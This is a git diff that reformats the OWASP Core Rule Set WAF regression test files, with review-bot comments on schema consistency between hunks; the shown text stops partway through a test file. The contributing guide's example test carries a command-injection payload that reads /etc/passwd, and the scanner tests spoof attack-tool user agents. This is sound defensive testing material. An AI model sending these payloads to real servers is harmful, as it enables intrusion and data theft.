.../951210.yaml | 40 +- .../951220.yaml | 78 +- .../951230.yaml | 77 +- .../951240.yaml | 77 +- .../951250.yaml | 40 +- .../951260.yaml | 40 +- .../953100.yaml | 178 +- .../953101.yaml | 188 +- .../953120.yaml | 256 +- .../954100.yaml | 34 +- .../954120.yaml | 
69 +-
.../tests/RESPONSE-955-WEB-SHELLS/955100.yaml | 114 +-
.../tests/RESPONSE-955-WEB-SHELLS/955260.yaml | 37 +-
.../959100.yaml | 110 +-
.../RESPONSE-980-CORRELATION/980170.yaml | 122 +-
tests/regression/tests/base_positive_rules.py | 4 +-
.../tests/positivetest-light.yaml.skeleton | 412 +-
.../tests/positivetest.yaml.skeleton | 635 +-
298 files changed, 61124 insertions(+), 65282 deletions(-)
diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml
index 3b47fbf3d..73951bb2c 100644
--- a/.github/ISSUE_TEMPLATE/config.yml
+++ b/.github/ISSUE_TEMPLATE/config.yml
@@ -1,8 +1,8 @@
blank_issues_enabled: false
contact_links:
- name: Help and support
- url: https://security.stackexchange.com/questions/tagged/owasp-crs
+ url: https://security.stackexchange.com/questions/tagged/owasp-crs
about: For help and support please go here.
- name: OWASP Core Rule Set mailing list
- url: https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project
+ url: https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project
about: Ask general usage questions and participate in discussions on the CRS.
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 4a3e4b5b7..fc0a6aa47 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -372,23 +372,22 @@ Documentation on how to run the CRS test suite can be found in the [online docum
Example of a simple *positive test*:
```yaml
-- test_title: 932230-26
+- test_id: 26
desc: "Unix command injection"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=` /bin/cat /etc/passwd`"
- version: HTTP/1.1
- output:
- log_contains: id "932230"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=` /bin/cat /etc/passwd`"
+ version: HTTP/1.1
+ output:
+ log_contains: id "932230"
```
This test will succeed if the log output contains `id "932230"`, which would indicate that the rule in question matched and generated an alert.
@@ -402,21 +401,20 @@ The rule's description field, `desc`, is important. It should describe what is b
Example of a simple *negative test*:
```yaml
-- test_title: 932260-4
+- test_id: 4
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- method: "POST"
- port: 80
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: "localhost"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- data: 'foo=ping pong tables'
- uri: '/post'
- output:
- no_log_contains: id "932260"
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "POST"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ data: 'foo=ping pong tables'
+ uri: '/post'
+ output:
+ no_log_contains: id "932260"
```
This test will succeed if the log output does **not** contain `id "932260"`, which would indicate that the rule in question did **not** match and so did **not** generate an alert.
diff --git a/tests/regression/README.md b/tests/regression/README.md
index 540fabc56..43f8e83d7 100644
--- a/tests/regression/README.md
+++ b/tests/regression/README.md
@@ -15,22 +15,22 @@ The OWASP CRS project was part of the effort to develop the Web Application Fire
---
meta:
author: "csanders-git"
- enabled: true
name: "911100.yaml"
description: "Description"
+ rule_id: 911100
tests:
- - test_title: 911100-1
+ - test_id: 1
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: "localhost"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- output:
- no_log_contains: "id \"911100\""
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ output:
+ log:
+ expect_id: 911100
```
For go-ftw, please check out from [go-ftw releases page](https://github.com/coreruleset/go-ftw/releases).
diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml
index 8f0372447..41b04c3b8 100644
--- a/tests/regression/nginx-overrides.yaml
+++ b/tests/regression/nginx-overrides.yaml
@@ -99,7 +99,7 @@ test_overrides:
output:
expect_error: true
- rule_id: 944120
- test_ids: [6, 7, 23, 24, 40, 41, 57, 58, 74, 75, 91, 92, 108, 109, 125, 126,]
+ test_ids: [6, 7, 23, 24, 40, 41, 57, 58, 74, 75, 91, 92, 108, 109, 125, 126]
reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this"
output:
expect_error: true
diff --git a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml
index 49387c8c3..e66fd8cc6 100644
--- a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml
+++ b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml
@@ -1,144 +1,135 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "911100.yaml" description: "Description" +rule_id: 911100 tests: - - test_title: 911100-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "GET" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: "id \"911100\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "OPTIONS" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/options" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "OPTIONS" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/options" + version: "HTTP/1.1" + output: + no_log_contains: "id \"911100\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "HEAD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/head" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-4 + - input: + dest_addr: 
"127.0.0.1" + method: "HEAD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/head" + version: "HTTP/1.1" + output: + no_log_contains: "id \"911100\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "test=value" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "test=value" + version: "HTTP/1.1" + output: + no_log_contains: "id \"911100\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "TEST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/test" - version: "HTTP/1.1" - output: - log_contains: "id \"911100\"" - - test_title: 911100-6 + - input: + dest_addr: "127.0.0.1" + method: "TEST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/test" + version: "HTTP/1.1" + output: + log_contains: "id \"911100\"" + - test_id: 6 desc: Method is not allowed by policy (911100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: DELETE - port: 80 - uri: "/delete" - version: HTTP/1.0 - output: - log_contains: id "911100" - - test_title: 911100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: DELETE + port: 80 + uri: "/delete" + version: HTTP/1.0 + output: + log_contains: id "911100" + - test_id: 7 desc: Method is not allowed by policy (911100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: FOO - port: 80 - uri: "/foo" - version: HTTP/1.0 - output: - log_contains: id "911100" - - test_title: 911100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: FOO + port: 80 + uri: "/foo" + version: HTTP/1.0 + output: + log_contains: id "911100" + - test_id: 8 desc: Method is not allowed by policy (911100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: SUBSCRIBE - port: 80 - uri: "/subscribe" - version: HTTP/1.0 - output: - log_contains: id "911100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: SUBSCRIBE + port: 80 + uri: "/subscribe" + version: HTTP/1.0 + output: + log_contains: id "911100" diff --git a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml index 0ba29d89d..eec82c958 100644 --- a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml +++ b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml 
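Review bot: The rewritten stages keep the substring assertions `no_log_contains: "id \"911100\""` and `log_contains: id "911100"`, while the README hunk in this same patch documents the structured form `output:` / `log:` / `expect_id: 911100`; if go-ftw accepts both, the converted files should settle on one, otherwise a later schema tightening will break every test here at once. Tests 6, 7 and 8 also mix plain scalars (`dest_addr: 127.0.0.1`, `Host: localhost`, `version: HTTP/1.0`) with the quoted style of tests 1–5; since every line of the file is rewritten anyway, normalising them to the quoted form would keep the whole file clear of YAML implicit-typing surprises.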
@@ -2,130 +2,121 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 913100.yaml tests: - - test_title: 913100-1 + - test_id: 1 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "913100" - - test_title: 913100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "913100" + - test_id: 2 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: Arachni/0.2.1 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "913100" - - test_title: 913100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: Arachni/0.2.1 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "913100" + - test_id: 3 desc: Request Indicates a Security Scanner Scanned the Site (913100) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: nuclei - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "913100" - - test_title: 913100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: nuclei + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "913100" + - test_id: 4 desc: "Scanner identification based on User-agent field" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "nessus" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "913100" - - test_title: 913100-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "nessus" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "913100" + - test_id: 5 desc: "YUM package manager allow list" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "urlgrabber/3.10 yum/3.4.3" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "913100" - - test_title: 913100-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "urlgrabber/3.10 yum/3.4.3" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "913100" + - test_id: 6 desc: "ZGrab" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "Mozilla/5.0 zgrab/0.x" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "913100" - - test_title: 913100-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "Mozilla/5.0 zgrab/0.x" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "913100" + - test_id: 7 desc: "eCairn allow list" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "mozilla/5.0 ecairn-grabber/1.0 (+http://ecairn.com/grabber)" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "913100" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "mozilla/5.0 ecairn-grabber/1.0 (+http://ecairn.com/grabber)" + Host: "localhost" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "913100" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml index 88109fb8d..01a8b318e 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml 
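Review bot: This hunk removes `name: 913100.yaml` and `enabled: true` from `meta` but, unlike the 911100, 920100 and 920120 files in the same patch, adds no `rule_id: 913100` after `description: None`; the hunk counts (130 → 121 for seven dropped `- stage:` lines plus the two meta keys) confirm nothing was added, so the file no longer states which rule it exercises. Add `rule_id: 913100` at the same position as in the sibling files. Separately, `description: None` is a placeholder left as a plain scalar; replacing it with a real description would be cheap while the file is being rewritten.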
@@ -1,276 +1,259 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920100.yaml" description: "Tests to trigger, or not trigger 920100" +rule_id: 920100 tests: - - test_title: 920100-1 + - test_id: 1 desc: Standard GET request stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920100\"" + - test_id: 2 desc: | Request has tab (\t) before request method - Apache complains AH00126: Invalid URI in request GET / HTTP/1.1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: " GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - status: 400 - - test_title: 920100-3 + - input: + dest_addr: "127.0.0.1" + method: " GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 3 desc: Perfectly valid OPTIONS request stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "*" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-4 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "*" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920100\"" + - test_id: 4 desc: Valid CONNECT stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "CONNECT" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "1.2.3.4:80" - version: "HTTP/1.1" - output: - status: 200 - no_log_contains: "id \"920100\"" - - test_title: 920100-5 + - input: + dest_addr: "127.0.0.1" + method: "CONNECT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "1.2.3.4:80" + version: "HTTP/1.1" + output: + status: 200 + no_log_contains: "id \"920100\"" + - test_id: 5 desc: invalid Connect request, domains require ports stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "CONNECT" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "www.coreruleset.org" - version: "HTTP/1.1" - output: - status: 400 - - test_title: 920100-6 + - input: + dest_addr: "127.0.0.1" + method: "CONNECT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "www.coreruleset.org" 
+ version: "HTTP/1.1" + output: + status: 400 + - test_id: 6 desc: This is an acceptable CONNECT request for SSL tunneling stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "CONNECT" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "www.coreruleset.org:80" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-7 + - input: + dest_addr: "127.0.0.1" + method: "CONNECT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "www.coreruleset.org:80" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920100\"" + - test_id: 7 desc: Valid request with query and anchor components stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/index.html?I=Like&Apples=Today#tag" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/index.html?I=Like&Apples=Today#tag" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920100\"" + - test_id: 8 desc: | The colon in the path is not allowed. 
Apache will block by default (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/index.html:80?I=Like&Apples=Today#tag" - version: "HTTP/1.1" - output: - status: 400 - - test_title: 920100-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/index.html:80?I=Like&Apples=Today#tag" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 9 desc: Normal Options request with path stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-10 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920100\"" + - test_id: 10 desc: An invalid method with a long name stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "REALLYLONGUNREALMETHOD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920100\"" - - test_title: 920100-11 + - input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920100\"" + - test_id: 11 desc: | An invalid request because a backslash is used in uri Apache will end up blocking this before it gets to CRS. We will need to support OR output tests to fix this stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "\\" - version: "HTTP/1.1" - output: - status: 400 - - test_title: 920100-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "\\" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 12 desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: 